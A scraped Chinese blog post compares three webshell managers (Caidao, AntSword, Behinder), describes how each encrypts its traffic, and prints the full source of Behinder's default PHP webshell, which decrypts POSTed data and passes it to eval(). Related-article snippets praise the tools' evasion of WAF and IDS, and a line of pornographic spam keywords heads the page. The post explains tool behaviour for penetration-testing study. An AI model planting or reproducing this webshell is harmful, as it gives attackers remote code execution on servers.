国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

菜刀、蟻劍以及冰蝎三款Webshell管理工具簡介

2年前作者:永遠(yuǎn)是少年啊分類:Toy博客閱讀(21)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了菜刀、蟻劍以及冰蝎三款Webshell管理工具簡介。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

今天繼續(xù)給大家介紹滲透測(cè)試相關(guān)知識(shí),本文主要內(nèi)容是菜刀、蟻劍以及冰蝎三款Webshell管理工具簡介。

免責(zé)聲明:
本文所介紹的內(nèi)容僅做學(xué)習(xí)交流使用,嚴(yán)禁利用文中技術(shù)進(jìn)行非法行為,否則造成一切嚴(yán)重后果自負(fù)!
再次強(qiáng)調(diào):嚴(yán)禁對(duì)未授權(quán)設(shè)備進(jìn)行滲透測(cè)試!

一、三款webshell管理工具簡單對(duì)比

當(dāng)前,在滲透測(cè)試時(shí)常用的webshell管理工具又菜刀、蟻劍和冰蝎。者三款webshell管理工具特點(diǎn)如下所示:
1、菜刀
菜刀屬于比較原始的插件,功能比較單一,使用比較簡單,目前沒有提供插件,也不支持?jǐn)U展,目前也已經(jīng)停止更新,傳輸方式是單項(xiàng)加密傳輸。此外,菜刀的問題在于只能夠處理eval()函數(shù),而無法處理assert()等函數(shù)。
2、蟻劍
蟻劍是一款還處于更新狀態(tài)的工具,存在插件倉庫,擴(kuò)展性強(qiáng),采取的數(shù)據(jù)傳輸方式是單向加密傳輸。蟻劍與菜刀相比支持編碼和解碼功能。
3、冰蝎
冰蝎目前也處于更新狀態(tài),但是不支持插件,采取的數(shù)據(jù)傳輸方式是雙向加密傳輸,可以聯(lián)動(dòng)MSF。冰蝎相對(duì)而言偏向于后滲透階段。

二、菜刀數(shù)據(jù)包解析

使用菜刀連接PHP webshell的通信數(shù)據(jù)包如下所示:
菜刀、蟻劍以及冰蝎三款Webshell管理工具簡介
從上圖可以看出,菜刀的數(shù)據(jù)包是不加密的。

三、蟻劍數(shù)據(jù)包解析

使用蟻劍連接PHP webshell的通信數(shù)據(jù)包如下所示:
菜刀、蟻劍以及冰蝎三款Webshell管理工具簡介
從上圖可以看出,蟻劍對(duì)payload進(jìn)行加密的邏輯是,將payload進(jìn)行加密后,轉(zhuǎn)化為一個(gè)參數(shù)的值,然后控制接收該參數(shù)并進(jìn)行解密。

四、冰蝎數(shù)據(jù)包解析

使用冰蝎連接default_xor_base64類型的PHP webshell的通信數(shù)據(jù)包如下所示:
菜刀、蟻劍以及冰蝎三款Webshell管理工具簡介
菜刀、蟻劍以及冰蝎三款Webshell管理工具簡介
從上圖可以看出,冰蝎的數(shù)據(jù)包是加密的。
冰蝎生成的PHP木馬如下所示:

<?php
@error_reporting(0);
function Decrypt($data)
{
    $key="e45e329feb5d925b"; 
    $bs="base64_"."decode";
	$after=$bs($data."");
	for($i=0;$i<strlen($after);$i++) {
    	$after[$i] = $after[$i]^$key[$i+1&15]; 
    }
    return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>

在上述代碼中,file_get_contents(“php://input”)可以接收客戶端以POST的方式上傳的參數(shù),上傳的結(jié)果會(huì)作為Decrypt參數(shù)的輸入。
Decrypt函數(shù)的作用是對(duì)原始數(shù)據(jù)先進(jìn)行Base64解密,然后再進(jìn)行流解密,最后把數(shù)據(jù)處理的結(jié)果輸出,實(shí)際上就是一個(gè)數(shù)據(jù)解密過程。
原創(chuàng)不易,轉(zhuǎn)載請(qǐng)說明出處:https://blog.csdn.net/weixin_40228200文章來源地址http://www.zghlxwxcb.cn/news/detail-462879.html

到了這里,關(guān)于菜刀、蟻劍以及冰蝎三款Webshell管理工具簡介的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Web安全-Behinder(冰蝎)Webshell管理工具使用

    Web安全-Behinder(冰蝎)Webshell管理工具使用

    點(diǎn)擊頁面右側(cè)\\\"releases\\\",進(jìn)入工具的版本下載頁面。 在個(gè)人終端安裝JDK1.8環(huán)境的情況下,下載zip壓縮包后打開Behinder.jar即可 類別 運(yùn)行環(huán)境要求 客戶端 jre8+ 服務(wù)端 .net 2.0+;php 5.3-7.4;java 6+ 冰蝎(behinder)是一款動(dòng)態(tài)二進(jìn)制加密網(wǎng)站管理客戶端。也叫做webshell管理工具,第一代w

    2024年02月13日
    瀏覽(30)
  • webshell管理工具-antSword(蟻劍)的安裝和管理

    webshell管理工具-antSword(蟻劍)的安裝和管理

    中國蟻劍是一款流行的網(wǎng)絡(luò)安全工具,它由中國安全研究人員研發(fā),主要用于測(cè)試和評(píng)估網(wǎng)絡(luò)的安全性。 蟻劍具有強(qiáng)大的功能,可以用于遠(yuǎn)程控制和管理服務(wù)器,包括文件管理、進(jìn)程管理、端口掃描、SQL注入、WebShell等功能。它還可以在未授權(quán)的情況下訪問和操縱目標(biāo)系統(tǒng),

    2024年02月16日
    瀏覽(22)
  • Web安全-AntSword(中國蟻劍)Webshell管理工具使用

    Web安全-AntSword(中國蟻劍)Webshell管理工具使用

    螞劍工具的下載分為兩個(gè)部分,一個(gè)是項(xiàng)目核心源碼antSword,另一個(gè)是加載器AntSword-Loader。我們依次進(jìn)行下載,并且進(jìn)行說明 先點(diǎn)擊進(jìn)入antSword,點(diǎn)擊頁面右側(cè)\\\"releases\\\",進(jìn)入工具的源碼下載頁面進(jìn)行源碼下載。 而后點(diǎn)擊進(jìn)入AntSword-Loader,點(diǎn)擊頁面右側(cè)\\\"releases\\\",進(jìn)入加載器下

    2024年02月12日
    瀏覽(26)
  • webshell管理工具-冰蝎(Behinder)的安裝和基礎(chǔ)使用(msf聯(lián)動(dòng),流量特征)

    webshell管理工具-冰蝎(Behinder)的安裝和基礎(chǔ)使用(msf聯(lián)動(dòng),流量特征)

    冰蝎是一款基于Java開發(fā)的動(dòng)態(tài)加密通信流量的新型Webshell客戶端,由于通信流量被加密,傳統(tǒng)的WAF、IDS 設(shè)備 難以 檢測(cè),給威脅狩獵帶來較大挑戰(zhàn)。冰蝎其最大特點(diǎn)就是對(duì)交互流量進(jìn)行對(duì)稱加密,且加密密鑰是由隨機(jī)數(shù)函數(shù)動(dòng)態(tài)生成,因此該客戶端的流量幾乎無法檢測(cè)。 gi

    2024年02月02日
    瀏覽(26)
  • 【webshell工具——蟻劍】蟻劍安裝使用教程

    【webshell工具——蟻劍】蟻劍安裝使用教程

    本篇內(nèi)容主要為webshell工具蟻劍的安裝以及使用,本人也通過查詢較多的文章,進(jìn)行了總結(jié),由于是第一次接觸,有些地方可能存在問題,歡迎評(píng)論區(qū)留言。 [步驟1] 蟻劍工具的下載 廢話不多說直接放鏈接 加載(啟動(dòng))器: 鏈接: https://github.com/AntSwordProject/AntSword-Loader 加速器選

    2024年02月07日
    瀏覽(21)
  • web安全第四天:webshell原理與菜刀使用

    web安全第四天:webshell原理與菜刀使用

    1.1 WebShell的含義 WebShell就是以asp、php、jsp或者cgi等網(wǎng)頁文件形式存在的一種命令執(zhí)行環(huán)境,也可以將其稱做為一種網(wǎng)頁后門。黑客在入侵了一個(gè)網(wǎng)站后,通常會(huì)將asp或php后門文件與網(wǎng)站服務(wù)器WEB目錄下正常的網(wǎng)頁文件混在一起,然后就可以使用瀏覽器來訪問asp或者php后門,得

    2024年02月06日
    瀏覽(16)
  • [JAVA安全webshell]冰蝎jsp木馬分析

    [JAVA安全webshell]冰蝎jsp木馬分析

    只是分享一下對(duì)冰蝎webshell分析的一個(gè)學(xué)習(xí)過程,冰蝎webshell使用了加載字節(jié)碼的方式執(zhí)行惡意代碼。 首先打開webshell 這么一行實(shí)在不好看,先把他分行吧。 分完行之后,就很清晰明了了。 導(dǎo)入了三個(gè)依賴,一個(gè)是標(biāo)準(zhǔn)庫,兩個(gè)估計(jì)用于加密。 然后定義了一個(gè)類U,繼承自

    2024年02月09日
    瀏覽(25)
  • 三款好用的 Docker 可視化管理工具

    三款好用的 Docker 可視化管理工具

    關(guān)注公眾號(hào):“DevOps實(shí)戰(zhàn)派”,獲取更多DevOps和運(yùn)維的精彩內(nèi)容。 Docker提供了命令行工具(Docker CLI)用來管理容器、鏡像和網(wǎng)絡(luò)等組件,但除此之外,我們也可以使用可視化管理工具來更加方便地進(jìn)行管理。 本文,我將介紹3款免費(fèi)且好用的 Docker 可視化管理工具。 Docker D

    2024年04月15日
    瀏覽(379)

  • 推薦三款Scrum敏捷項(xiàng)目管理工具/敏捷管理實(shí)踐

    免費(fèi)版敏捷工具推薦: Leangoo領(lǐng)歌 Leangoo領(lǐng)歌是ScrumCN(scrum.cn)旗下的一款 永久免費(fèi)的專業(yè)敏捷開發(fā)管理工具 ,提供端到端敏捷研發(fā)管理解決方案,涵蓋敏捷需求管理、任務(wù)協(xié)同、進(jìn)展跟蹤、缺陷管理、統(tǒng)計(jì)度量等。包括小型團(tuán)隊(duì)敏捷開發(fā),規(guī)模化敏捷SAFe,Scrum of Scrums大規(guī)模

    2024年02月11日
    瀏覽(31)
  • Webshell管理工具

    Webshell管理工具

    Webshell是以ASP、PHP、JSP或者CGl等網(wǎng)頁文件形式存在的一種代碼執(zhí)行環(huán)境,主要用于網(wǎng)站管理、服務(wù)器管理、權(quán)限管理等操作。 Webshell使用方法簡單,只需上傳一個(gè)代碼文件,通過網(wǎng)址訪問,便可進(jìn)行很多日常操作,極大地方便了使用者對(duì)網(wǎng)站和服務(wù)器的管理。 正因如此,也有

    2024年02月13日
    瀏覽(17)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包